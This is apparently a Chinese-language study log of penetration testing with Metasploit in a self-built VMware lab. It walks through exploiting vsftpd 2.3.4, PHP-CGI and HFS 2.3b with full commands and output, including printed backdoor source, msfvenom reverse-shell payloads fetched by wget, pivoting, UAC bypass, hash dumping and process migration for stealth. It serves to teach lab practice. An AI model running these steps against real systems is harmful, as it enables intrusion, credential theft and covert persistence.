启程

本书的一开始写到:

纪念所有为国捐躯的英勇战士。

后面的所有实验中,如未说明,我使用的都是Mac OSX上的:

msfconsole --version
Framework Version: 4.17.18-dev-6660b1857beb0befdb4a453c76e57fce94064867

渗透测试阶段

  1. 前期交互:与客户讨论,确定目标及范围等
  2. 信息收集
    • 目标选择
    • 隐私收集
    • 踩点(主动/被动扫描)
    • 验证目标的安全机制
  3. 威胁建模:根据信息,找出弱点
  4. 漏洞分析
  5. 渗透
  6. 后渗透
  7. 报告

这个流程来自Penetration Testing Execution Standard(PTES)

我建议在使用攻击模块对真实目标进行渗透测试前,在虚拟环境下对所有攻击模块进行模拟测试。

当我们试图利用这个有漏洞的HFS进行渗透时,却发现渗透失败了。这是一种很常见的场景,因为来自外部的恶意流量可能在防火墙处被拦截了。

若出现这种情况,可以简单地改变入侵的方式,让目标服务器主动建立到我们的连接。防火墙通常会被配置为检测入站流量而不是出站流量。

NexposeMetasploit Pro可以自动化完成威胁建模。

Metasploit基础

它的banner还挺好看的,每次都不一样:

Metasploit版本

  • Metasploit Pro: For penetration testers and IT security teams
  • Metasploit Community: For small companies and students
  • Metasploit Framework: For developers and security researchers

See more about Metasploit versions on https://www.rapid7.com/products/metasploit/download/editions/.

基本命令

# Metasploit
    # 选择模块
    use [Auxiliary/Exploit/Payload/Encoder]
    # 显示可用模块
    show [exploits/payloads/encoder/auxiliary/options]
    # 赋值
    set [options/payload]
    set RHOST 192.168.1.1
    # 进行全局赋值,在模块切换后该对象的值不会改变
    setg [options/payload]
    # 设置完成辅助模块后启动辅助模块
    run
    # 启动exploit模块
    exploit
    # 返回上一级
    back
    # 列出模块信息
    info
    # 搜索模块,很有用
    search ms17_010
    # 检查某个目标是否易受攻击
    check
    # 列出当前可用会话
    sessions [session number]

# Meterpreter
    # 列出目标主机系统信息
    sysinfo
    # 列出目标主机网络情况
    ifconfig
    ipconfig
    # 列出目标主机ARP缓存
    arp
    # 将激活状态的会话放入后台
    background
    # 获取目标主机的一个shell
    shell
    # 获取当前用户细节
    getuid
    # 提权
    getsystem
    # 获取Meterpreter会话在目标主机上注入进程的进程号
    getpid
    # 列举目标主机上的进程
    ps

info有点意思,我们来试一下:

msf > search ms17_010

Matching Modules
================

   Name                                           Disclosure Date  Rank     Description
   ----                                           ---------------  ----     -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


msf > info exploit/windows/smb/ms17_010_psexec

       Name: MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
     Module: exploit/windows/smb/ms17_010_psexec
   Platform: Windows
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-03-14

Provided by:
  sleepya
  zerosum0x0
  Shadow Brokers
  Equation Group

对未知网络进行渗透测试

本节通过一次渗透测试来学习Metasploit。

假设

假设我们的测试范围是一个单独的IP:172.16.56.130,没有其他任何背景信息。

目标环境搭建

两台Metasploitable2,一台有hfs2.3b.exe的Windows机器,我这里使用的是Windows 7。hfs2.3b.exe可以从这里下载。

利用VMWare构建网络拓扑如下:

我们假设,攻击者不具有网络拓扑这个背景信息。

信息收集

service postgresql start
msfdb init
# if you want to use a new database, you can
# msfdb delete
# msfdb init

msfconsole

# in metasploit
msf > db_status
[*] postgresql connected to msf

数据库相关命令:

msf > db_
db_connect        db_disconnect     db_export         db_import         db_nmap           db_rebuild_cache  db_status

扫描:

# -sV: service scan -p: ports specified
db_nmap -sV -p 21,22,25,80,110,443,445 172.16.56.130

结果会被自动存入数据库,可查看:

msf > services
Services
========

host           port  proto  name         state     info
----           ----  -----  ----         -----     ----
172.16.56.130  21    tcp    ftp          open      vsftpd 2.3.4
172.16.56.130  22    tcp    ssh          open      OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
172.16.56.130  25    tcp    smtp         open      Postfix smtpd
172.16.56.130  80    tcp    http         open      Apache httpd 2.2.8 (Ubuntu) DAV/2
172.16.56.130  110   tcp    pop3         filtered
172.16.56.130  443   tcp    https        filtered
172.16.56.130  445   tcp    netbios-ssn  open      Samba smbd 3.X - 4.X workgroup: WORKGROUP

我们还可以进一步筛选上线的服务:

msf > services -u
Services
========

host           port  proto  name         state  info
----           ----  -----  ----         -----  ----
172.16.56.130  21    tcp    ftp          open   vsftpd 2.3.4
172.16.56.130  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
172.16.56.130  25    tcp    smtp         open   Postfix smtpd
172.16.56.130  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
172.16.56.130  445   tcp    netbios-ssn  open   Samba smbd 3.X - 4.X workgroup: WORKGROUP

还可以列举主机。当然,此时只有一台target:

msf > hosts

Hosts
=====

address        mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------        ---  ----  -------  ---------  -----  -------  ----  --------
172.16.56.130             Linux                      server

威胁建模

从已知信息中找出弱点。比如我们发现目标有vsftpd服务,那么可以

search vsftpd

发现

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution

注意,恰好版本号相符。这时候我们要进一步了解这个漏洞。

VSFTPD v2.3.4后门

我们在msf里就可以获得一些漏洞信息:

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(unix/ftp/vsftpd_234_backdoor) > info

       Name: VSFTPD v2.3.4 Backdoor Command Execution
     Module: exploit/unix/ftp/vsftpd_234_backdoor
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-07-03

Provided by:
  hdm <x@hdm.io>
  MC <mc@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   yes       The target address
  RPORT  21               yes       The target port (TCP)

Payload information:
  Space: 2000
  Avoid: 0 characters

Description:
  This module exploits a malicious backdoor that was added to the
  VSFTPD download archive. This backdoor was introduced into the
  vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011
  according to the most recent information available. This backdoor
  was removed on July 3rd 2011.

References:
  CVE: Not available
  OSVDB (73573)
  http://pastebin.com/AetT9sS5
  http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html

参考pastebin.com/AetT9sS5发现这是一个vsftpd早期版本源代码中的恶意后门:

后门函数如下:

// vsftpd-2.3.4/sysdeputil.c
int vsf_sysutil_extra(void)
{
    int fd, rfd;
    struct sockaddr_in sa;
    if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        exit(1);
    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_port = htons(6200);
    sa.sin_addr.s_addr = INADDR_ANY;
    if((bind(fd,(struct sockaddr *)&sa, sizeof(struct sockaddr))) < 0)
        exit(1);
    if((listen(fd, 100)) == -1)
        exit(1);
    for(;;){
        rfd = accept(fd, 0, 0);
        close(0); close(1); close(2);
        dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
        execl("/bin/sh","sh",(char *)0);
    }
}

而触发漏洞函数的代码逻辑位于:

// vsftpd-2.3.4/str.c
else if((p_str->p_buf[i]==0x3a) && (p_str->p_buf[i+1]==0x29)){
    vsf_sysutil_extra();
}

Exploit

下面我们配置模块:

msf exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 172.16.56.130
RHOST => 172.16.56.130
msf exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   Name               Disclosure Date  Rank    Description
   ----               ---------------  ----    -----------
   cmd/unix/interact                   normal  Unix Command, Interact with Established Connection

msf exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact

成功获得一个root shell:

下面我们尝试将普通shell提升为meterpreter。首先在攻击者机器上制作一个针对目标系统的后门文件:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.56.1 LPORT=4444 -f elf >backdoor.elf

[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes

然后在本地通过

python -m http.server

开启一个小型的server,把后门文件放在这个server的根目录:

接着在之前获取的shell中用wget下载后门文件:

我们在server上也能看到日志:

(后来想了一下,不要像我上面这样用sudo开80端口,就用一般的端口就好了,否则如果被目标机器那边的高手反取自己的root,就得不偿失了。)

为使msf与目标通信,我们再打开一个msfconsole运行一个渗透模块控制程序(handler)。其相关设置要和之前生成backdoor.elf时的配置相同:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > set LHOST 172.16.56.1
LHOST => 172.16.56.1

配置完毕后运行,开启监听:

然后在刚才的shell中运行后门:

这时切换到监听的终端:

我们拥有了一个meterpreter!


更新

后来发现,其实不需要这么麻烦,直接将shell提升为meterpreter即可:

首先exploit -z,即不要与新session交互:

然后直接使用命令提升shell:


接下来挖掘目标机器的更多信息:

meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

meterpreter > ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 16436
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : eth0
Hardware MAC : 00:0c:29:01:78:f0
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 172.16.56.130
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fe01:78f0
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  3
============
Name         : eth1
Hardware MAC : 00:0c:29:01:78:fa
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.6.129
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fe01:78fa
IPv6 Netmask : ffff:ffff:ffff:ffff::

也可以

meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.6.0/255.255.255.0
Local subnet: 172.16.56.0/255.255.255.0

我们发现其连接着一个192.168.6.0/24的内部网络。使用arp命令查看内部网络中其他计算机有没有与其建立连接:

meterpreter > arp

ARP cache
=========

    IP address     MAC address        Interface
    ----------     -----------        ---------
    172.16.56.1    00:50:56:c0:00:08
    192.168.6.128  00:0c:29:28:f7:12
    192.168.6.254  00:50:56:ff:00:10

其中.254是VMWare虚拟网络本身使用的地址。所以.128处有一台机器。我们在meterpreter中建立一个跳板:

meterpreter > run autoroute -s 192.168.6.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.6.0/255.255.255.0...
[+] Added route to 192.168.6.0/255.255.255.0 via 172.16.56.130
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.6.0        255.255.255.0      Session 1

成功设置跳板。先将meterpreter切入后台:

meterpreter > background
[*] Backgrounding session 1...

接下来使用端口扫描模块扫描刚发现的.128机器:

msf exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.6.128
RHOSTS => 192.168.6.128
msf auxiliary(scanner/portscan/tcp) > run

我们观察到80端口开放,所以检查一下其运行的服务:

msf auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/http/http_version
msf auxiliary(scanner/http/http_version) > show options

Module options (auxiliary/scanner/http/http_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.6.128    yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads
   VHOST                     no        HTTP server virtual host

msf auxiliary(scanner/http/http_version) > run

这里又是攻击者的背景知识了。PHP 5.2.4存在漏洞,可以导致系统被控制。

PHP-CGI查询字符串参数漏洞

该漏洞编号为CVE-2012-1823。简单的漏洞描述如下:

According to the PHP site, when PHP is used in a CGI-based setup (such as Apache’s mod_cgid), php-cgi receives a processed query string parameter as command-line argument, which allows command-line switches, such as -s, -d or -c, to be passed to the php-cgi binary, which can be exploited to disclose source code and obtain arbitrary code execution. Therefore, a remote unauthenticated attacker could obtain sensitive information, cause a DoS condition, or may be able to execute arbitrary code with the privileges of the web server.

A common example of this vulnerability will allow disclosure of source code when the following URL is visited: http://localhost/index.php?-s.

为了深入了解可以参考P牛的PHP-CGI远程代码执行漏洞(CVE-2012-1823)分析

简单搜索:

msf > search cve-2012-1823

Matching Modules
================

   Name                                      Disclosure Date  Rank       Description
   ----                                      ---------------  ----       -----------
   exploit/multi/http/php_cgi_arg_injection  2012-05-03       excellent  PHP CGI Argument Injection

通过

msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(multi/http/php_cgi_arg_injection) > info

也能获得一些信息:

Description:
  When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable
  to an argument injection vulnerability. This module takes advantage
  of the -d flag to set php.ini directives to achieve code execution.
  From the advisory: "if there is NO unescaped '=' in the query
  string, the string is split on '+' (encoded space) characters,
  urldecoded, passed to a function that escapes shell metacharacters
  (the "encoded in a system-defined manner" from the RFC) and then
  passes them to the CGI binary." This module can also be used to
  exploit the plesk 0day disclosed by kingcope and exploited in the
  wild on June 2013.

Exploit

msf exploit(multi/http/php_cgi_arg_injection) > show options

Module options (exploit/multi/http/php_cgi_arg_injection):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   PLESK        false            yes       Exploit Plesk
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                         yes       The target address
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI                     no        The URI to request (must be a CGI-handled PHP script)
   URIENCODING  0                yes       Level of URI URIENCODING and padding (0 for minimum)
   VHOST                         no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(multi/http/php_cgi_arg_injection) > set RHOST 192.168.6.128
RHOST => 192.168.6.128

查看可用的payloads:

msf exploit(multi/http/php_cgi_arg_injection) > show payloads

我们使用强大的meterpreter:

msf exploit(multi/http/php_cgi_arg_injection) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/http/php_cgi_arg_injection) > show options

Module options (exploit/multi/http/php_cgi_arg_injection):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   PLESK        false            yes       Exploit Plesk
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST        192.168.6.128    yes       The target address
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI                     no        The URI to request (must be a CGI-handled PHP script)
   URIENCODING  0                yes       Level of URI URIENCODING and padding (0 for minimum)
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(multi/http/php_cgi_arg_injection) > set LHOST 172.16.56.1
LHOST => 172.16.56.1

结果什么也没有:

我想了一下,也许是reverse_tcp反向shell的问题(说白了就是网络方面的问题),所以换成正向shell试试:

msf exploit(multi/http/php_cgi_arg_injection) > set payload php/meterpreter/bind_tcp
payload => php/meterpreter/bind_tcp

成功:

到目前,我们已经获得了两个shell:

接下来用一些别的命令看看:

meterpreter > getwd
/var/www

meterpreter > getuid
Server username: www-data (33)

注意,我们现在依然处于php meterpreter中。输入shell进入系统shell:

这样一来就可以执行各种系统命令(如wget之类)。

在这个shell中ping -c 4 172.16.56.1,告诉我网络不可达:

这解释了为什么刚刚的反向shell不能使用。这一点与书中的情况不一致。书中作者没有做任何这方面的路由转发就可以直接用反向shell攻击成功。我尝试添加路由表,但是权限不够(www-data):

现在,我们利用与攻陷第一台目标机器相同的方式开启一个正式的meterpreter(PHP版meterpreter功能有限)。只不过由于上述原因,我们要用正向shell了:

msfvenom -p linux/x86/meterpreter/bind_tcp msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=6666 -f elf >backdoor2.elf

同时也只能先把这个后门文件传给.129,然后让.128.129上下载。

开启python临时服务器:

python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
# 进入192.168.6.129的meterpreter
sessions 2
shell
wget http://172.16.56.1:8000/backdoor2.elf
cd /var/www
mv /backdoor2.elf ./
chown www-data:www-data backdoor2.elf
chmod 777 backdoor2.elf

然后进入.128的php meterpreter:

新开一个msfconsole:

msf exploit(multi/handler) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp

msf exploit(multi/handler) > set RHOST 192.168.6.128
RHOST => 192.168.6.128

msf exploit(multi/handler) > set LPORT 6666
LPORT => 6666

然后在php meterpreter开的shell中运行./backdoor2.elf,再

没反应。我怀疑是php meterpreter开启的shell受到了某些限制。

其实上面的想法是错误的。问题在于,我们不应该新开一个msfconsole去连接bind shell,原因很简单,因为这个新的msfconsole没有到192.168.6.128的路由!

所以我们要在同一个msfconsole中先运行.backdoor2.elf再连接。

我现在还不知道怎样操作,因为一旦进入php meterpreter中执行shell后怎么能切换出去呢?我的一个想法是通过./backdoor2.elf &将其后台运行,然后推出这个shell,再use ...bind_tcp去连接。这样会进行到

然后卡住,依然不能给出一个新的session。

另外,作者从这里获得的是一个root权限的meterpreter。这点我不理解,就算能成功,获得的也该是一个www-data权限的吧。所以我觉得作者做了其他诸如提权的措施,或者他的环境中php是以root权限运行的,但是没有告诉读者。

.128的渗透暂时到此。


更新

如果我们预先按照后面解决网络问题的方式在.128中添加路由,那么反向shell就可以使用。这种情况下,可以按照如下方式获得一个正常的meterpreter:

msf exploit(multi/http/php_cgi_arg_injection) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp

从而可以继续获得其他信息:

meterpreter > ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 16436
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : eth0
Hardware MAC : 00:0c:29:28:f7:12
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.6.128
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fe28:f712
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > getuid
Server username: uid=33, gid=33, euid=33, egid=33

网络问题

前面多次遇到了路由问题,这里将问题重新描述一下,希望能够在未来解决它。

我们的测试网络是

A <-> B <-> C

这样的模型。即B具有两个网段的IP,相当于DMZ主机。A作为攻击者,能且只能直接访问B,C同理能且只能直接访问B。在A获得B的meterpreter后,利用这个会话建立了一个通向B-C内网的路由,因此A可以访问到C,但是在这种情况下,C依然不能访问到A,因为C并不知道到A的数据包应该怎样路由(所有A发给C的数据包经过B的转发,到达C时C会认为这是B发过来的)。因此,包括reverse_tcp在内的所有涉及C主动向A发包的操作都不可行。

为解决这个问题,我们需要建立C到A的路由。

首先,我们明确一下A与C之间能够相互ping通的处理方法:

# on A (Mac OSX)
sudo route add -net 192.168.6.0/24 172.16.56.130
# on B (Linux)
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
# on C (Linux)
sudo route add -net 172.16.56.0/24 gw 192.168.6.129

这是很好理解的。

在拿下B的root权限后,前两条都是我们可以控制的,也基本类似于run autoroute -s 192.168.6.0/24。现在问题在于,C上的操作我们没法进行,因为我们只能借助php拿到一个www-data的shell,还不能为其添加路由表。

因此,我猜测在在作者的环境中,192.168.6.129被设置为192.168.6.0/24网段的网关了。也就是说,所有该网段的其他机器都将其视作网关。

在这种情况下,有两种处理方式:

  • 对目标机器提权,然后在其上添加路由表项
  • 直接修改实验环境,让所有其他机把.129当作网关(即预先执行一次上面的第三条命令)

在后面对Win的渗透中,我暂时先采取第二种方式。即预先配置:

另一个目标:Windows

我们在.129上arp表中又发现了一台内网机器与之通信:

meterpreter > arp

ARP cache
=========

    IP address     MAC address        Interface
    ----------     -----------        ---------
    172.16.56.1    00:50:56:c0:00:08
    192.168.6.110  00:0c:29:cf:8c:46

于是对其做端口扫描:

msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.6.110
RHOSTS => 192.168.6.110
msf auxiliary(scanner/portscan/tcp) > exploit

我们看一下8080运行的是什么服务:

msf auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/http/http_header
msf auxiliary(scanner/http/http_header) > show options

Module options (auxiliary/scanner/http/http_header):

   Name         Current Setting                                                        Required  Description
   ----         ---------------                                                        --------  -----------
   HTTP_METHOD  HEAD                                                                   yes       HTTP Method to use, HEAD or GET (Accepted: GET, HEAD)
   IGN_HEADER   Vary,Date,Content-Length,Connection,Etag,Expires,Pragma,Accept-Ranges  yes       List of headers to ignore, seperated by comma
   Proxies                                                                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.6.128                                                          yes       The target address range or CIDR identifier
   RPORT        80                                                                     yes       The target port (TCP)
   SSL          false                                                                  no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                                                                      yes       The URI to use
   THREADS      1                                                                      yes       The number of concurrent threads
   VHOST                                                                               no        HTTP server virtual host

msf auxiliary(scanner/http/http_header) > set RPORT 8080
RPORT => 8080
msf auxiliary(scanner/http/http_header) > setg RHOSTS 192.168.6.110
RHOSTS => 192.168.6.110
msf auxiliary(scanner/http/http_header) > set HTTP_METHOD GET
HTTP_METHOD => GET

发现是HFS 2.3b。它存在一个远程代码执行漏洞。

CVE-2014-6287

msf auxiliary(scanner/http/http_header) > search hfs

Matching Modules
================

   Name                                        Disclosure Date  Rank       Description
   ----                                        ---------------  ----       -----------
   exploit/multi/http/git_client_command_exec  2014-12-18       excellent  Malicious Git and Mercurial HTTP Server For CVE-2014-9390
   exploit/windows/http/rejetto_hfs_exec       2014-09-11       excellent  Rejetto HttpFileServer Remote Command Execution

参考info windows/http/rejetto_hfs_exec

Description:
  Rejetto HttpFileServer (HFS) is vulnerable to remote command
  execution attack due to a poor regex in the file ParserLib.pas. This
  module exploits the HFS scripting commands by using '%00' to bypass
  the filtering. This module has been tested successfully on HFS 2.3b
  over Windows XP SP3, Windows 7 SP1 and Windows 8.

parserLib.pas文件中的findMacroMarker函数不能正确处理空字节:

function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;

Exploit

首先按照之前提到的,解决网络问题:

# on A (Mac OSX)
sudo route add -net 192.168.6.0/24 172.16.56.130
# on B (Linux, DMZ)
sudo echo 1 > /proc/sys/net/ipv4/ip_forward

此时Windows已经能够ping通攻击者机器。

msf > use exploit/windows/http/rejetto_hfs_exec
msf exploit(windows/http/rejetto_hfs_exec) > set RHOST 192.168.6.110
RHOST => 192.168.6.110
msf exploit(windows/http/rejetto_hfs_exec) > set RPORT 8080
RPORT => 8080

msf exploit(windows/http/rejetto_hfs_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf exploit(windows/http/rejetto_hfs_exec) > set LPORT 7777
LPORT => 7777

不容易,又拿到一个meterpreter。

当然了,从HFS的Log也能看出被入侵:

接下来看看:

meterpreter > sysinfo
Computer        : TEST
OS              : Windows 7 (Build 7600).
Architecture    : x64
System Language : zh_CN
Domain          : RAMBO
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getuid
Server username: TEST\rambo

在getsystem时遇到错误:

参考Metasploit 「信息搜集」抓取用户 HASH,可能是Win7的UAC导致的。解决方法是最开始以管理员身份运行HFS。这样可以提权成功:

也可以不这样做,尝试一下bypassuac:

meterpreter > background
[*] Backgrounding session 11...

msf exploit(windows/http/rejetto_hfs_exec) > search bypassuac

Matching Modules
================

   Name                                              Disclosure Date  Rank       Description
   ----                                              ---------------  ----       -----------
   exploit/windows/local/bypassuac                   2010-12-31       excellent  Windows Escalate UAC Protection Bypass
   exploit/windows/local/bypassuac_comhijack         1900-01-01       excellent  Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   exploit/windows/local/bypassuac_eventvwr          2016-08-15       excellent  Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   exploit/windows/local/bypassuac_fodhelper         2017-05-12       excellent  Windows UAC Protection Bypass (Via FodHelper Registry Key)
   exploit/windows/local/bypassuac_injection         2010-12-31       excellent  Windows Escalate UAC Protection Bypass (In Memory Injection)
   exploit/windows/local/bypassuac_injection_winsxs  2017-04-06       excellent  Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
   exploit/windows/local/bypassuac_sluihijack        2018-01-15       excellent  Windows UAC Protection Bypass (Via Slui File Handler Hijack)
   exploit/windows/local/bypassuac_vbs               2015-08-22       excellent  Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)

msf exploit(windows/http/rejetto_hfs_exec) > use exploit/windows/local/bypassuac_eventvwr
msf exploit(windows/local/bypassuac_eventvwr) > show options

Module options (exploit/windows/local/bypassuac_eventvwr):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows x86

然而这些搜索到的bypassuac对我的Windows 7环境无效。所有还是以管理员身份运行HFS吧。也就是说,我们现在已经有了system权限。

来提取一下hash。很奇怪,直接hashdump会失败:

但是run hashdump,也就是用script,会成功:

我们看看当前的meterpreter位于哪个进程中:

meterpreter > getpid
Current pid: 4012

meterpreter > ps

Process List
============

 PID   PPID  Name                     Arch  Session  User                          Path
 ---   ----  ----                     ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                   x64   0
 260   4     smss.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 316   500   svchost.exe              x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
...
 2224  3028  acrotray.exe             x86   1        TEST\rambo                    C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
...
 4012  3560  dgsbevVcjI.exe           x86   1        TEST\rambo                    C:\Users\rambo\AppData\Local\Temp\radD2774.tmp\dgsbevVcjI.exe
...

为了隐蔽和持久,我们将其迁入2224进程中(本来打算迁移到explorer.exe,失败了):

meterpreter > migrate 2224
[*] Migrating from 4012 to 2224...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 2224

更新

后来读到一篇博文Dumping Hashes on Win2k8 R2 x64 with Metasploit,作者在hashdump时遇到了同样的问题。他的解决方案是先把会话迁入一个具有system权限的64位进程,然后hashdump就可以成功。我这里的靶机也是64位的,但是一开始的meterpreter进程却是32位的,且它的权限token还是普通管理员权限(尽管使用了getsystem)。我按照他的方法尝试一下:

# original meterpreter
1424  3424  aAEXKduKiUJr.exe   x86   1        TEST\rambo                    C:\Users\rambo\AppData\Local\Temp\radC2AA5.tmp\aAEXKduKiUJr.exe

# after migrating
1992  504   dllhost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\dllhost.exe

成功了:


